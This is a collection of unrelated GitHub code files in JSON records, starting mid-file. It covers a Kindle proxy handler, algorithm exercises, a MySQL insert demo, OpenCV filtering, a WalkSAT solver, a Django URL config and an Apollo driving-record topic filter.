bytes(body, 'UTF-8')\n\n\n_POLL_BODY = b'00'\n_POLL_HEADERS = { 'Content-Type': 'text/xml;charset=UTF-8' }\n\nclass TODO_GetItems (Upstream):\n\tdef __init__(self):\n\t\tUpstream.__init__(self, TODO, TODO_PATH + 'getItems')\n\n\tdef call(self, request, device):\n\t\tif request.headers['X-ADP-Reason'] == 'Poll':\n\t\t\treturn DummyResponse(headers = _POLL_HEADERS, data = _POLL_BODY)\n\t\tq = request.get_query_params()\n\t\treason = q.get('reason')\n\t\tif reason == 'Poll':\n\t\t\treturn DummyResponse(headers = _POLL_HEADERS, data = _POLL_BODY)\n\n\t\tif device.is_provisional():\n\t\t\t# tell the device to do a full snapshot upload, so that we can get the device serial and identify it\n\t\t\treturn DummyResponse(headers = _POLL_HEADERS, data = _first_contact(request, device))\n\n\t\tif reason == 'ServiceRefresh':\n\t\t\treturn DummyResponse(headers = _POLL_HEADERS, data = _service_refresh(request, device))\n\n\t\tlto = q.get('device_lto', -1)\n\t\tif lto != -1:\n\t\t\ttry: device.lto = int(lto)\n\t\t\texcept: pass\n\n\t\tresponse = self.call_upstream(request, device)\n\t\tif response.status == 200:\n\t\t\t# use default UTF-8 encoding\n\t\t\twith minidom.parseString(response.body_text()) as doc:\n\t\t\t\tif _process_xml(request, doc, device):\n\t\t\t\t\txml = doc.toxml('UTF-8')\n\t\t\t\t\tresponse.update_body(xml)\n\n\t\treturn response\n","repo_name":"pwr/KSP","sub_path":"src/handlers/get_items.py","file_name":"get_items.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"5"} +{"seq_id":"2537542865","text":"import socket\r\ns = socket.socket()\r\n\r\nhost = socket.gethostname()\r\nport = 1234\r\n\r\ns.connect((host, port))\r\nprint(s.recv(1024))\r\n#\r\n# from urllib.request import urlopen\r\n# webpage = urlopen('http:\\\\www.python.org')\r\n#\r\n# import re\r\n# text = webpage.read()\r\n# m = re.search(b'
about', text, re.IGNORECASE)\r\n# m.group()\r\n\r\n\r\n","repo_name":"ysy-hn/python","sub_path":"网络编程客户端.py","file_name":"网络编程客户端.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8369099532","text":"from __future__ import print_function\r\n\r\nimport MySQLdb as my\r\ntry:\r\n db = my.connect(host=\"localhost\",\r\n user=\"shikhagarg\",\r\n passwd=\"root\",\r\n db=\"world\")\r\n \r\n cursor = db.cursor()\r\n name = \"newcity\"\r\n cc = 'SNC'\r\n district = 'someyork'\r\n pop = 2232422\r\n \r\n data = [\r\n ('city1','MAC','dis1',23421),\r\n ('city2','sdf','dis2',23422),\r\n ('city3','sad','dis3',23424),\r\n ('city4','sdw','dis4',23423)]\r\n \r\n sql = \"insert into city(name,countrycode,district,population)\\\r\n values(%s,%s,%s,%s)\"\r\n \r\n num = cursor.executemany(sql,data)\r\n db.commit()\r\n db.close()\r\n\r\nexcept my.Error as e:\r\n print(e)\r\nexcept :\r\n print(\"Unknown error occured\")\r\n","repo_name":"shikhagarg0192/Python","sub_path":"mysql4.py","file_name":"mysql4.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"1042518877","text":"import pylablib\nID = 'Thorlabs.list_kinesis_devices()'\nfrom pylablib.devices import Thorlabs\ndef translate(s):\n output=''\n for character in s:\n temp=''\n if character.isdigit():\n c=0\n elif ord(character)==32:\n output+='1111 '\n else:\n с=87\n character=ord(character)-c\n while character > 0:\n temp += str(character % 3)\n character //= 3\n output+=temp[::-1].rjust(4,'0')+' '\n print('encode: ',output)\n encodetogrd(output)\n\ndef encodetogrd(s):\n output = ''\n grader = {\n '0': 45,\n '1': 67.5,\n '2': 90,\n ' ':''\n }\n for character in s:\n output+=grader[character]\n move(grader[character])\n print('Angle array: ', output)\n\ndef move(grad):\n Thorlabs.list_kinesis_devices()\n stage = Thorlabs.KinesisMotor(ID)\n stage.move_to(grad)\n\n\ndef calibration():\n stage = Thorlabs.KinesisMotor(ID)\n stage.home(sync=True)\n\nif __name__==\"__main__\":\n while True:\n translate(input('Enter your string:'))","repo_name":"pawelroza/translator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19024488303","text":"class Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n found = [None]\n # recurive check if [p,q] can be found in this tree\n def dfs(root):\n if not root:return False, False\n lp, lq = dfs(root.left)\n rp, rq = dfs(root.right)\n p_found = lp or rp or root.val == p.val\n q_found = lq or rq or root.val == q.val\n if p_found and q_found and not found[0]:\n found[0] = root\n return p_found, q_found\n dfs(root)\n return found[0]","repo_name":"yijencheng/Leetcode","sub_path":"tree/post-order/235_Lowest_Common_Ancestor_of_a_Binary_Search_Tree(post).py","file_name":"235_Lowest_Common_Ancestor_of_a_Binary_Search_Tree(post).py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43336877589","text":"# Implement an algorithm to find the kth to last element of a singly linked list.\n\nclass Node(object):\n\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\nclass SingleList(object):\n\n head = None\n tail = None\n\n def show(self):\n x = self.head\n while x is not None:\n print(x.data, end='')\n print(\" -> \", end='')\n x = x.next\n print(None)\n\n def append(self, data):\n new_node = Node(data, None)\n if self.head is None:\n self.head = self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n\n def remove(self, node_value):\n prev = None\n x = self.head\n while x is not None:\n if x.data == node_value:\n if prev is not None:\n prev.next = x.next\n else:\n self.head = x.next\n break\n else:\n prev = x\n x = x.next\n if x.next is None:\n self.tail = x\n if self.head is None:\n self.tail = None\n\n def is_empty(self):\n return self.head is None\n\n def remove_duplicates_with_buffer(self):\n letters = {}\n x = self.head\n prev = None\n while x is not None:\n try:\n letters[x.data]\n prev.next = x.next\n except KeyError:\n letters[x.data] = True\n prev = x\n x = x.next\n\n def remove_duplicates(self):\n x = self.head\n runner = x\n while x is not None:\n while runner.next is not None:\n if x.data == runner.next.data:\n runner.next = runner.next.next\n else:\n runner = runner.next\n x = x.next\n runner = x\n\n def find_k_recursevely(self, k):\n return self.find_k_recurse(k, self.head)[0]\n\n def find_k_recurse(self, k, x):\n if x is None:\n return (None, 0)\n k_data, cnt = self.find_k_recurse(k, x.next)\n if cnt == k:\n return (x.data, cnt+1)\n else:\n return (k_data, cnt+1)\n\n def find_k_with_2_passes(self, k):\n cnt = 0\n x = self.head\n while x is not None:\n cnt += 1\n x = x.next\n k = cnt - k\n cnt = 0\n x = self.head\n while x is not None:\n cnt += 1\n if cnt == k:\n return x.data\n x = x.next\n return None\n\n def find_k(self, k):\n p1 = self.head\n p2 = self.head\n cnt = 0\n while cnt != k:\n cnt += 1\n p2 = p2.next\n if p2 is None:\n return None\n while p2.next:\n p1 = p1.next\n p2 = p2.next\n return p1.data\n\n\nif __name__ == \"__main__\":\n ll = SingleList()\n ll.append(\"F\")\n ll.append(\"O\")\n ll.append(\"L\")\n ll.append(\"L\")\n ll.append(\"O\")\n ll.append(\"W\")\n ll.append(\" \")\n ll.append(\"U\")\n ll.append(\"P\")\n ll.show()\n print(ll.find_k_recursevely(3))\n print(ll.find_k_with_2_passes(3))\n print(ll.find_k(3))\n","repo_name":"bmpasini/CtCI-6th-Edition","sub_path":"chap-2/2.2.py","file_name":"2.2.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"5"} +{"seq_id":"28644482345","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 17 11:18:52 2021\r\n\r\n@author: Fred\r\n\"\"\"\r\nimport ananimlib as al\r\n\r\n\r\ngrid = al.CoordGrid([16,10], [16,10], [1,1],[.5,.5])\r\nrect = al.CompositeAnObject()\r\nabout = al.Dot()\r\narrow = al.Arrow([0,0], [0,0])\r\nrect.add_anobject(al.Rectangle([1,1]))\r\nrect.add_anobject(about)\r\n\r\nal.Animate(\r\n al.AddAnObject(grid),\r\n al.AddAnObject(rect),\r\n \r\n al.MoveTo(rect, [3,2],duration=1.0),\r\n \r\n al.SetAboutPoint(rect, [-2,-1]), \r\n)\r\nrect.add_anobject(arrow),\r\narrow.position=[0,0]\r\nal.Animate(\r\n\r\n al.RunParallel(\r\n al.MoveTo([rect,about],[-2,-1],duration=1.0),\r\n al.SlideAttribute([rect,arrow], 'head_pos', \r\n al.Vector([-2,-1]),duration=1.0)\r\n ),\r\n\r\n al.MoveTo(rect, [0,0],duration=1.0),\r\n al.Wait(1.0)\r\n)\r\n \r\nal.play_movie()\r\n","repo_name":"gtruch/ananimlib","sub_path":"docs/code/quickstart_ex6_1.py","file_name":"quickstart_ex6_1.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"25975539573","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 26 20:10:17 2023\n\n@author: dhvilleg\n\"\"\"\n\nimport cv2\nimport numpy as np\n\nbananos = cv2.imread('/home/dhvilleg/Documents/proyectos/DeepVision/bananos.jpg')\n\ncv2.imshow(\"fOriginal\",bananos)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nkernel_3x3 = np.ones((3,3))/(3*3)\noutput_3x3 = cv2.filter2D(bananos, -1, kernel_3x3)\ncv2.imshow(\"filtrp 3x3\",output_3x3)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\nkernel_11x11 = np.ones((11,11))/(11*11)\noutput_11x11 = cv2.filter2D(bananos, -1, kernel_11x11)\ncv2.imshow(\"filtrp 11x11\",output_11x11)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nkernel_37x37 = np.ones((37,37))/(37*37)\noutput_37x37 = cv2.filter2D(bananos, -1, kernel_37x37)\ncv2.imshow(\"filtrp 37x37\",output_37x37)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\nkernel_97x97 = np.ones((97,97))/(97*97)\noutput_97x97 = cv2.filter2D(bananos, -1, kernel_97x97)\ncv2.imshow(\"filtrp 97x97\",output_97x97)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"dhvilleg/MachineLearning_ClasificadorImagenes","sub_path":"filtrado_imagenes.py","file_name":"filtrado_imagenes.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10783995922","text":"import string\nimport random\n\nclass WalkSAT(object):\n \n def __init__(self, KB, file, p, max_flips):\n \n self.KB = KB;\n self.variables = file.variables;\n self.clauses = file.clauses;\n self.p = p;\n self.max_flips = max_flips;\n \n def search(self,):\n \n assign = {}\n List = list(string.ascii_uppercase[0:self.variables]);\n i = 1;\n while( len(List) != self.variables):\n List.append('A' + str(i));\n i = i +1\n \n # initiate all proposition symbols with random assignment\n assign = WalkSAT.random_gen_assign(self, assign, List);\n \n for i in range(0, self.max_flips):\n n = WalkSAT.check_clauses(self, assign)\n if self.clauses == n:\n return assign\n false_clauses = WalkSAT.false_clauses(self, assign);\n false_clause = WalkSAT.select_one(self, false_clauses);\n \n #choose from the two options randomly: 1. choose a random variable from the false_clause and change it in the assignment\n # 2. choose the variable which a value satisfies the most clauses in the KB\n if_statement = random.choice([0]*self.p*10 + [1]*(1-self.p)*10);\n if if_statement == 0:\n symbol = WalkSAT.random_value(self, false_clause) \n assign = WalkSAT.change_model(self, assign, symbol);\n else:\n assign = WalkSAT.most_satisfied(self, assign, n, false_clause)\n\n def change_model(self, assign, symbol):\n #add the new variable with the new value from the random_value\n #input: variable with value\n #output: assignment with the new variable with value\n \n for i in symbol:\n assign[i] = symbol[i];\n return assign\n \n def random_value(self, clause):\n #chose random value a variable in a false clauses\n #input: a false_clause\n #output: returns a variable with a value \n \n size = len(clause);\n number = random.randint(0, size-1);\n \n count = 0;\n for i in clause:\n if count == number:\n if clause[i] == True:\n value = clause[i];\n index = i;\n if clause[i] == False:\n value = clause[i];\n index = i;\n count = count + 1;\n \n symbol = {};\n symbol[index] = value;\n return symbol\n \n def select_one(self, false_clauses):\n # select one of the false_clauses\n #input: all the false clauses\n #output: just one false clause\n \n size = len(false_clauses);\n number = random.randint(0, size-1);\n \n false_clause = false_clauses[number];\n return false_clause\n \n \n def false_clauses(self, assign):\n # find all of the clauses that are not satisfied by the assignment\n #input: the assignment\n #output: the set of clauses that are not satisfied\n \n KB = self.KB;\n \n clauses = [];\n for i in range(0, len(KB)):\n count = 0;\n for j in KB[i]:\n \n if KB[i][j] == assign[j]:\n count = count + 1;\n \n if count == 0:\n clauses.append(KB[i])\n \n return clauses; \n \n\n def random_gen_assign(self, assign, List):\n #it generates randomly the values to the variables of the assignment.\n #input: the assignment itself and the list of variables\n #output the assignment with the values of true and false assigned\n \n for i in range(0, self.variables):\n randomValue = random.randint(0,1);\n \n if randomValue == 0:\n assign[List[i]] = False;\n if randomValue == 1:\n assign[List[i]] = True;\n \n return assign \n \n def check_clauses(self, assign):\n #check the clauses if they are being satisfied\n #input: the assignment\n #output: the clauses that are true\n \n KB = self.KB;\n \n clauses_true = 0;\n for i in range(0, len(KB)):\n count = 0;\n for j in KB[i]:\n \n if KB[i][j] == assign[j]:\n count = count + 1;\n \n if count > 0:\n clauses_true = clauses_true + 1;\n \n return clauses_true; \n \n \n def most_satisfied(self, assign, n_max, false_clause):\n #it returns the assignment that satisfies the most clauses\n #input: assign, number of satisfied clauses, and all the false clauses\n #output: new assignment\n \n old_assign = assign.copy();\n new_assign = [];\n \n for j in false_clause:\n assign = old_assign.copy();\n for i in assign:\n if j == i:\n if assign[i] == False:\n assign[i] = True;\n n = WalkSAT.check_clauses(self, assign);\n if n > n_max:\n new_assign = assign;\n n_max = n;\n continue;\n \n if assign[i] == True:\n assign[i] = False;\n n = WalkSAT.check_clauses(self, assign);\n if n > n_max:\n new_assign = assign;\n n_max = n;\n continue;\n \n if not new_assign:\n return old_assign\n else:\n return new_assign \n \n ","repo_name":"NunoDuarte/python_projects","sub_path":"SAT_algorithm/WalkSAT.py","file_name":"WalkSAT.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"37153630326","text":"import fairlearn\nimport pandas as pd\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\n#from fairlearn.metrics import selection_rate, false_positive_rate, true_positive_rate, count\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score\n#from fairlearn.metrics import MetricFrame\nimport sklearn.metrics as skm\nimport sys\n\npathway = Path()\nfilename = sys.argv[1]\nprint(filename)\nfile_total = pathway.glob(f\"{filename}\").__next__()\ndf_total=pd.read_csv(file_total,header=None,names=[\"name\",\"PLDDT\",\"ss\"],sep ='\\s+')\n\nprint(df_total.head(10))\n\ndf_total = df_total.dropna()\nprint(df_total)\n\n# create y_true so that the prediction is true if PLDDT > 80\ndf_total.loc[df_total['PLDDT'].astype(int) >= 80, 'y_true' ] = 1\ndf_total.loc[df_total['PLDDT'].astype(int) < 80, 'y_true' ] = 1\ndf_total['y_true'] = df_total['y_true'].astype(int)\nprint(df_total)\n\n# create y_pred so that the prediction is correct if PLDDT > 80\ndf_total.loc[df_total['PLDDT'].astype(int) >= 80, 'y_pred' ] = 1\ndf_total.loc[df_total['PLDDT'].astype(int) < 80, 'y_pred' ] = 0\ndf_total['y_pred'] = df_total['y_pred'].astype(int)\nprint(df_total)\n\n\nfrom fairlearn.metrics import MetricFrame\n#import sklearn.metrics as skm\n\ny_true = df_total['y_true']\ny_pred = df_total['y_pred']\ngroup_membership_data = df_total['ss']\ngrouped_metric = MetricFrame(metrics=skm.recall_score,y_true=y_true,y_pred=y_pred,sensitive_features=group_membership_data)\n\nprint(\"Overall recall = \", grouped_metric.overall)\nprint(\"recall by groups = \", grouped_metric.by_group.to_dict())\n\n\nfrom fairlearn.metrics import selection_rate, false_positive_rate, true_positive_rate, count\n#from sklearn.metrics import accuracy_score, precision_score, recall_score\n\n\n# 'false positive rate': false_positive_rate,\nmetrics = {\n 'accuracy': accuracy_score,\n 'precision': precision_score,\n 'recall': recall_score,\n 'true positive rate': true_positive_rate,\n 'selection rate': selection_rate,\n 'count': count}\n\nmetric_frame = MetricFrame(metrics=metrics,y_true=y_true,y_pred=y_pred,sensitive_features=group_membership_data)\n\next = filename[-3:]\nif ext == 'csv':\n title='Secondary structures'\nelif ext == 'dat':\n title='Residues'\nelse:\n print('Verify the filename extension')\n\n\nmetric_frame.by_group.plot.bar(\n subplots=True,\n layout=[3, 3],\n legend=False,\n figsize=[12, 8],\n title=f\"Group metrics for {title}\", \n)\n\nplt.savefig(f'{title}_fairness', facecolor=\"white\", bbox_inches=\"tight\", dpi=600)\n","repo_name":"Usmanovsky/md-scripts","sub_path":"alpha-fold/fairlearn/flearn.py","file_name":"flearn.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"16758052924","text":"'''\nInvestigating numbers that can be expressed as the sum of a prime square, cube,\nand fourth power?\n'''\n\nimport intlib\n\n\ndef main():\n TARGET = 50000000\n primes = intlib.primes(int(TARGET ** 0.5))\n p_squares = [p ** 2 for p in primes if p ** 2 <= TARGET]\n p_cubes = [p ** 3 for p in primes if p ** 3 <= TARGET]\n p_fths = [p ** 4 for p in primes if p ** 4 <= TARGET]\n ans = set()\n for a in p_squares:\n for b in p_cubes:\n for c in p_fths:\n if a + b + c <= TARGET:\n ans.add(a + b + c)\n\n return len(ans)\n\n\nif __name__ == '__main__':\n import time\n t1 = time.time()\n print(main())\n t2 = time.time()\n print('{:.3f} s'.format(t2 - t1))\n","repo_name":"tasusu/ProjectEuler","sub_path":"problem87.py","file_name":"problem87.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"70545159831","text":"#!/usr/bin/env python3\n\"\"\"Starts program and handles input\"\"\"\n\nimport argparse\nfrom pathlib import Path\nimport sys\nfrom dotenv import load_dotenv\n\n# import like this so we can call files in another folder\nsys.path.append('./')\nimport internal_py.setup as setup\nimport internal_py.caterpillar as caterpillar\n\ndef main():\n \"\"\"Performs general setup and call appropriate application\"\"\"\n\n # load configuration\n env_path = Path('.') / 'configs' / '.env'\n load_dotenv(dotenv_path=env_path)\n\n # setup logger\n setup.setup_logger()\n\n # start up the server and run forever\n caterpillar.run()\n\n\n\n# Not current use\ndef select_app():\n \"\"\"Parses input flags to determine which program to run\"\"\"\n\n # Construct the argument parser\n parser = argparse.ArgumentParser()\n\n # Add the arguments to the parser\n parser.add_argument(\"-news\", action='store_true', help=\"Run Newspaper3k server\")\n parser.add_argument(\"-text\", action='store_true', help=\"Run text processing server\")\n flags = parser.parse_args()\n\n return flags\n\n# Default program entry point\nif __name__ == \"__main__\":\n main()\n ","repo_name":"wpwilson10/Caterpillar","sub_path":"cmd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27692402582","text":"import sys\nimport os\nimport openslide\nimport cv2 as cv\n\ndef getRect(positions):\n\tx_s = [];\n\ty_s = [];\n\tfor length in range(0,len(positions)):\n\t\tx_s.append(positions[length][0]);\n\t\ty_s.append(positions[length][1]);\n\tx_min = min(x_s);\n\tx_max = max(x_s);\n\ty_min = min(y_s);\n\ty_max = max(y_s);\n\treturn (x_min,y_min,x_max-x_min,y_max-y_min);\n\ndef readRegionsFromXml(xmlFileName):\n\tsrcHandle = open(xmlFileName,'r');\n\tsrcString = srcHandle.read();\n\tstrArray = srcString.split(\"\\n\");\n\tregions = [];\n\tregionId = 0;\n\trecordStart = False;\n\tfor line in range(0,len(strArray)):\n\t\t# print(strArray[line].lstrip());\n\t\tcurrent = strArray[line].lstrip();\n\t\tif current == '':\n\t\t\t# record end\n\t\t\tregionId +=1;\n\t\t\trecordStart = False;\n\t\tif recordStart:\n\t\t\tcurrent = current.replace('\"','');\n\t\t\tcoordirate = current.split(\" \");\n\t\t\t# print(coordirate);\n\t\t\tx = int((coordirate[1].split(\"=\"))[1]);\n\t\t\ty = int((coordirate[2].split(\"=\"))[1]);\n\t\t\tregions[regionId].append((x,y));\n\t\tif current == '':\n\t\t\t# record start\n\t\t\trecordStart = True;\n\t\t\tregions.append([]);\n\n\t# print(len(regions));\n\trects = [];\n\tfor regionId in range(0,len(regions)):\n\t\trect = getRect(regions[regionId]);\n\t\trects.append(rect);\n\treturn rects;\n\ndef main(argv):\n\tif len(argv) < 4:\n\t\tusage=\"Usage: \\n 3 Parameters are needed:\\n 1st is the svs file;\\n 2nd is the xml file;\\n 3rd is the output folder. \"\n\t\tprint(usage);\n\t\treturn False;\n\tsvsFileName = argv[1];\n\txmlFileName = argv[2];\n\toutputFolderPath = argv[3];\n\tsvsBaseName = os.path.basename(svsFileName).split('.')[0];\n\ttargetRects = readRegionsFromXml(xmlFileName);\n\tslide = openslide.OpenSlide(svsFileName);\n\tfor rect in targetRects:\n\t\ttargetImage = slide.read_region((rect[0],rect[1]),0, (rect[2],rect[3]),3);\n\t\tpath = os.path.join(outputFolderPath,svsBaseName+\"_\"+str(rect)+\".png\");\n\t\tcv.imwrite(path,targetImage);\n\t\nif __name__ == '__main__':\n main(sys.argv)\n\n\n\n\n\n\n\n","repo_name":"kitrol/Lymph","sub_path":"pythonNewTry/parseXml.py","file_name":"parseXml.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25764546736","text":"import re\nimport string\nfrom corpy.udpipe import Model\nfrom corpy.udpipe import pprint\nfrom typing import List\nfrom result import Result\nfrom store import Store\nfrom util import db_config,language_dict\nfrom mysql.connector import errorcode\n\n\nclass Udtrain(object):\n def __init__(self,modelName,corpusName,language):\n self.modelName = modelName\n self.corpusName = corpusName\n self.language = language\n\n try:\n self.storeData = Store(\n db_config['user'],\n db_config['password'],\n dbHost=db_config['db_host'],\n dbName=db_config['db_name'])\n\n self.cursor = self.storeData.dbConnect().cursor()\n # self.cursor = conn.cursor()\n\n except Exception as e:\n print(e)\n\n def loadData(self):\n try:\n with open(self.corpusName,'r',encoding=\"utf8\") as file:\n return self.cleanData(file.read())\n except Exception as e:\n print('File cant be opened cox of {}'.format(e))\n\n def cleanData(self,data: str) -> str:\n data = re.sub(\"[\\n\\t]\",\"\",data)\n return data\n\n def doTrain(self) -> List[Result]:\n model = Model(self.modelName)\n corpusData = self.loadData()\n word_pos = list(model.process(corpusData))\n line_no = 0\n for index,sentence in enumerate(word_pos):\n singleSentence = self.extractSingleSentence(sentence)\n singleWord = self.extractSingleWord(sentence,singleSentence)\n self.storeData.insertData(self.cursor, singleWord,self.language)\n print('line %d, batch %d for %s written succeed' % (line_no,index,self.language))\n line_no += 1\n\n def extractSingleSentence(self,sentence) -> str:\n comment = \"\".join(sentence.comments)\n cs = re.findall(r'text = (.*)',comment)[0]\n return cs\n\n def extractSingleWord(self,sentence,sentence_text) -> [Result]:\n combinedData = []\n for word in sentence.words:\n if word.lemma not in string.punctuation:\n if word.lemma and word.upostag and sentence_text:\n combinedData.append(Result(word.lemma,word.upostag,sentence_text))\n return combinedData\n\n\nif __name__ == \"__main__\":\n udt = Udtrain(r\"C:\\Users\\haris\\Desktop\\wordFinder\\english-ewt-ud-2.5-191206.udpipe\",\n r\"C:\\Users\\haris\\Desktop\\wordFinder\\haris.txt\", \"English\")\n udt.doTrain()\n# storeData = Store()\n","repo_name":"harisalam/CSC-5030","sub_path":"myProject/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73680625751","text":"\"\"\"\nsetup URL Configuration\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework.permissions import AllowAny\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Django Crawler App\",\n default_version=\"v1\",\n description=\"API documentation for Django Crawler App\",\n terms_of_service=\"\",\n contact=openapi.Contact(email=\"\"),\n license=openapi.License(name=\"Test License\"),\n ),\n public=True,\n permission_classes=(AllowAny,),\n)\n\nurlpatterns = [\n path(\n \"api/doc\",\n schema_view.with_ui(\"swagger\", cache_timeout=0),\n name=\"schema-swagger-ui\",\n ),\n path(\"admin/\", admin.site.urls),\n path(\"api/\", include(\"loan.urls\")),\n]\n","repo_name":"coding-rev/Django-Loan-Test-App","sub_path":"setup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36339273081","text":"import pandas as pd\nimport time\nimport numpy as np\n\nclass data_clearn:\n\n @staticmethod\n def resp_to_df(resp):\n content = resp\n df = data_clearn.get_a_model()\n json_list = []\n for data in content[\"data\"]:\n index = {'block_timestamp': np.datetime64(data[\"timestamp\"],\"s\"),\n 'create_timestamp': int(time.time()),\n 'symbol': data[\"tokens_in\"][0][\"symbol\"] + \"_\" + data[\"tokens_out\"][0][\"symbol\"],\n 'net': data[\"tokens_in\"][0][\"network\"],\n 'amm':data[\"amm\"],\n 'chain_id':data[\"chain_id\"],\n 'transaction_address':data[\"transaction_address\"],\n 'block_number':data[\"block_number\"],\n 'token1':data[\"tokens_in\"][0][\"symbol\"],\n 'token1_price':data[\"tokens_in\"][0][\"price_usd\"],\n 'token1_amount':data[\"tokens_in\"][0][\"amount\"],\n 'token2':data[\"tokens_out\"][0][\"symbol\"],\n 'token2_price':data[\"tokens_out\"][0][\"price_usd\"],\n 'token2_amount':data[\"tokens_out\"][0][\"amount\"],\n 'wallet_address':data[\"wallet_address\"],\n 'wallet_category':data[\"wallet_category\"],\n 'pair_address':data[\"pair_address\"]\n }\n json_list.append(index)\n if len(json_list) == 0:\n return df\n df = df.append(json_list)\n df[\"create_timestamp\"] = pd.to_datetime(df[\"create_timestamp\"],unit='s')\n df['chain_id'] = df['chain_id'].astype('int64')\n df['block_number'] = df['block_number'].astype('int64')\n df[\"symbol\"] = df['symbol'].astype('string')\n return df\n\n\n\n @staticmethod\n def get_a_model():\n data = {'block_timestamp':[],\n 'create_timestamp':[],\n 'smybol': [],\n 'net': [],\n 'amm':[],\n 'chain_id':[],\n 'transaction_address':[],\n 'block_number':[],\n 'token1':[],\n 'token1_price':[],\n 'token1_amount':[],\n 'token2':[],\n 'token2_price':[],\n 'token2_amount':[],\n 'wallet_address':[],\n 'wallet_category':[],\n 'pair_address':[]\n }\n df = pd.DataFrame(data)\n return df","repo_name":"imsellbaox/guru_communication","sub_path":"HandlerData/utils/data_clean.py","file_name":"data_clean.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8467922244","text":"import argparse\nimport glob\nimport os\nimport sys\n\nimport glog\n\nfrom cyber.python.cyber_py3 import cyber\nfrom cyber.python.cyber_py3.record import RecordReader\nfrom cyber.python.cyber_py3.record import RecordWriter\n\n\nclass SamplePNC(object):\n \"\"\"Sample bags to contain PNC related topics only.\"\"\"\n TOPICS = [\n '/apollo/sensor/conti_radar',\n '/apollo/sensor/delphi_esr',\n '/apollo/sensor/gnss/best_pose',\n '/apollo/sensor/gnss/corrected_imu',\n '/apollo/sensor/gnss/gnss_status',\n '/apollo/sensor/gnss/imu',\n '/apollo/sensor/gnss/ins_stat',\n '/apollo/sensor/gnss/odometry',\n '/apollo/sensor/gnss/rtk_eph',\n '/apollo/sensor/gnss/rtk_obs',\n '/apollo/sensor/mobileye',\n '/apollo/canbus/chassis',\n '/apollo/canbus/chassis_detail',\n '/apollo/control',\n '/apollo/control/pad',\n '/apollo/navigation',\n '/apollo/perception/obstacles',\n '/apollo/perception/traffic_light',\n '/apollo/planning',\n '/apollo/prediction',\n '/apollo/routing_request',\n '/apollo/routing_response',\n '/apollo/localization/pose',\n '/apollo/drive_event',\n '/tf',\n '/tf_static',\n '/apollo/monitor',\n '/apollo/monitor/system_status',\n '/apollo/monitor/static_info',\n ]\n\n @classmethod\n def process_record(cls, input_record, output_record):\n print(\"filtering: {} -> {}\".format(input_record, output_record))\n output_dir = os.path.dirname(output_record)\n if output_dir != \"\" and not os.path.exists(output_dir):\n os.makedirs(output_dir)\n freader = RecordReader(input_record)\n fwriter = RecordWriter()\n if not fwriter.open(output_record):\n print('writer open failed!')\n return\n print('----- Begin to process record -----')\n for channelname, msg, datatype, timestamp in freader.read_messages():\n if channelname in SamplePNC.TOPICS:\n desc = freader.get_protodesc(channelname)\n fwriter.write_channel(channelname, datatype, desc)\n fwriter.write_message(channelname, msg, timestamp)\n print('----- Finish processing record -----')\n\n\nif __name__ == '__main__':\n cyber.init()\n parser = argparse.ArgumentParser(\n description=\"Filter pnc record. \\\n Usage: 'python sample_pnc_topic.py input_record output_record'\")\n parser.add_argument('input', type=str, help=\"the input record\")\n parser.add_argument('output', type=str, help=\"the output record\")\n args = parser.parse_args()\n SamplePNC.process_record(args.input, args.output)\n 